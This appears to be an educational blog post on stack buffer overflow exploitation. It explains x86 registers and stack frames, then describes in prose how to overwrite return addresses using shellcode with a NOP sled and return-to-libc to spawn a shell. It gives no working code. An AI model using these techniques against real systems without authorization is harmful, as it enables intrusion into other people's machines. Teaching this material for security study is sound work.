Art of PWN

x0j1 · December 31, 2019

Common registers

ESP

It is used to store the top address of the function call stack, which changes when pushing and popping the stack.

EBP

The base address used to store the current function state, which does not change when the function is running, and can be used to index to determine the location of function parameters or local variables.

EIP

It is used to store the address of the program instruction to be executed. The CPU reads and executes the instruction according to the storage content of the EIP, and the

EIP points to the next instruction next. Repeatedly, the program can execute the instruction continuously.

Stack area changes during function call

Parameters are pushed in reverse order

The next instruction address after calling the calling function (caller) is pushed onto the stack as the return address. In this way, the EIP (instruction) information of the calling function is saved.

Then push the current value of the EBP register (that is, the base address of the calling function) onto the stack, and update the value of the EBP register to the current top address. In this way, the EBP (base address) information of the calling function is saved. At the same time, the EBP is updated to the base address of the called function (callee).

The local variables of the called function are pushed onto the stack, and the data other than the calling parameters together form the state of the called function (callee). When a call occurs, the program will also store the instruction address of the called function (callee) in the eip register, so that the program can sequentially execute the instructions of the called function.

Having seen what happens when a function call occurs, it's not difficult to understand the change at the end of the function call. The core task of the change is to discard the state of the callee and restore the top of the stack to the state of the caller.

First, the local variables of the called function will pop directly from the stack, and the top of the stack will point to the base address of the called function (callee).

Then the base address of the calling function (caller) stored in the base address is popped from the stack and stored in the EBP register. In this way, the EBP (base address) information of the calling function (caller) is restored. At this point, the top of the stack points to the return address.

The return address is then popped from the stack and stored in the EIP register. In this way, the EIP (instruction) information of the caller is restored.

Stack overflow

When a function is executing an internal instruction, we cannot get control of the program. Only when a function call occurs or ends a function call, the control of the program will jump between function states. State to implement the attack.

Our goal is to have the EIP load the address of the attack instruction:

In the process of unstacking, the return address will be passed to the EIP, so we only need to let the overflow data overwrite the return address with the address of the attack instruction.

We can also include a piece of attack instructions in the overflow data, or we can look for available attack instructions elsewhere in memory.

All we have to do is replace the function specified by EIP with another function when called.

StackOverflow stuff:

Modify the return address to point to a section of shellcode in the overflow data
Modify the return address to point to a function that already exists in memory (return2libc)
Modify the return address to point to an existing instruction (ROP) in memory
Modify the address of a called function to point to another function (hijack GOT)

Shellcode:

The data at padding1 can be arbitrarily filled (note that if you use a string program to input overflow data, do not include "\ x00", otherwise truncation will be caused when the overflow data is passed to the program), and the length should just cover the base address of the function. address of shellcode is the address at the beginning of the subsequent shellcode and is used to override the return address. The data at padding2 can also be arbitrarily filled, and the length can be arbitrarily. The shellcode should be in hexadecimal machine code format.

According to the above construction, we have to solve two problems.

How long should the padding data (padding1) be before the return address?

We can use debugging tools (such as gdb) to view the assembly code to determine this distance, or use the method of increasing the input length to test when running the program (if the return address is overwritten by an invalid address such as "AAAA", the program will terminate with an error ).

What should the shellcode start address be?

We can check the location of the return address in the debugging tool (you can view the content of the EBP and then add 4 (32-bit machine), see the explanation of the function status above), but this address in the debugging tool is not consistent with normal operation This is caused by factors such as runtime environment variables. So in this case we can only get the approximate but inaccurate shellcode start address. The solution is to pad a number of "\ x90" in padding2. The instruction corresponding to this machine code is NOP (No Operation), that is, tell the CPU to do nothing, and then skip to the next instruction. With the filling of this paragraph of NOP, as long as the return address can hit any position in this paragraph, you can jump to the beginning of the shellcode without side effects, so this method is called NOP Sled (the Chinese meaning is "ski sled "). This way we can add NOP padding to match the experimental shellcode start address.

The operating system can set the starting address of the function call stack to randomization (this technique is called Memory Layout Randomization, or Address Space Layout Randomization (ASLR)), so that the function's return address will change randomly each time the program runs. Conversely, if the above-mentioned randomization is turned off by the operating system (this is the premise that the technology can take effect), the function return address will be the same each time the program runs, so that we can generate a core file by entering invalid overflow data, and then pass The debugging tool finds the location of the return address in the core file to determine the starting address of the shellcode.

After solving the above problems, we can stitch the final overflow data and enter it into the program to execute the shellcode.

One prerequisite for this method to work is that the data (shellcode) on the function call stack must have executable permissions (another prerequisite is to turn off randomization of the memory layout mentioned above). Many times the operating system will close the executable permission of the function call stack, so that the shellcode method is invalid, but we can also try to use the existing instructions or functions in memory. After all, these parts are executable, so they will not be affected. Restrictions on the above execution rights. This includes two methods, return2libc and ROP.

Return2libc

Determine the address of a function in memory and overwrite the return address with it. Because the functions in the libc dynamic link library are widely used, there is a high probability that the dynamic library can be found in memory. At the same time, because the library contains some system-level functions (such as system (), etc.), these system-level functions are usually used to gain control of the current process. Given that the function to be executed may require parameters, such as calling the system () function to open the shell in its full form system ("/ bin / sh"), the overflow data should also include the necessary parameters. The following takes the execution of system ("/ bin / sh") as an example, first writes the composition of the overflow data, and then determines the corresponding parts to fill in.

The data at padding1 can be filled at will (be careful not to include "\ x00", otherwise truncation will be caused when overflow data is passed to the program), and the length should just cover the base address of the function. address of system () is the address of system () in memory, which is used to override the return address. The data length at padding2 is 4 (32-bit machine), which corresponds to the return address when system () is called. Because we only need to open the shell here, and don't care about the behavior after exiting from the shell, the content of padding2 can be filled at will. address of "/ bin / sh" is the address of the string "/ bin / sh" in memory as a parameter to system ().

According to the above construction, we have to solve a problem.

How long should the padding data (padding1) be before the return address?

The solution is the same as the answer mentioned in the shellcode.

What should the system () function address be?

To answer this question, we need to see how the program calls functions in the dynamic link library. When a function is dynamically linked into a program, the program first determines the starting address of the dynamic link library in memory, plus the relative offset of the function in the dynamic library, to finally obtain the absolute address of the function in memory. When it comes to determining the memory address of the dynamic library, we must review the memory layout randomization (ASLR) mentioned in the shellcode. This technology will also randomize the starting address of the dynamic library load. Therefore, if ASLR is turned on by the operating system, the starting address of the dynamic library will change every time the program is run, so it is impossible to determine the absolute address of the function in the library. Under the premise that ASLR is closed, we can directly check the address of system () through the debugging tool during the running of the program, or the starting address of the dynamic library in memory, and then check the relative offset of the function in the dynamic library. , The absolute address of the function is calculated.

Finally, where is the address of "/ bin / sh"?

You can search for this string in the dynamic library. If it exists, you can determine its absolute address according to the dynamic library start address + relative offset. If you can't find it in the dynamic library, you can add this string to the environment variable, and then use getenv () and other functions to determine the address.

After solving the above problems, we can splice out the overflow data and enter it into the program to open the shell through system ().

Both of the above schemes require the operating system to turn off layout randomization (ASLR).

Both methods execute input instruction fragments (shellcode) or functions in the dynamic library (return2libc) by overriding the return address. It should be noted that both methods require the operating system to turn off memory layout randomization (ASLR), and the shellcode also requires the program call stack to have executable permissions.

Sign In

Art of PWN

Recommended Posts

x0j1

ESP

EBP

EIP

Stack area changes during function call

Stack overflow

StackOverflow stuff:

Shellcode:

Return2libc

References:

Join the conversation

Browse

Activity

Pages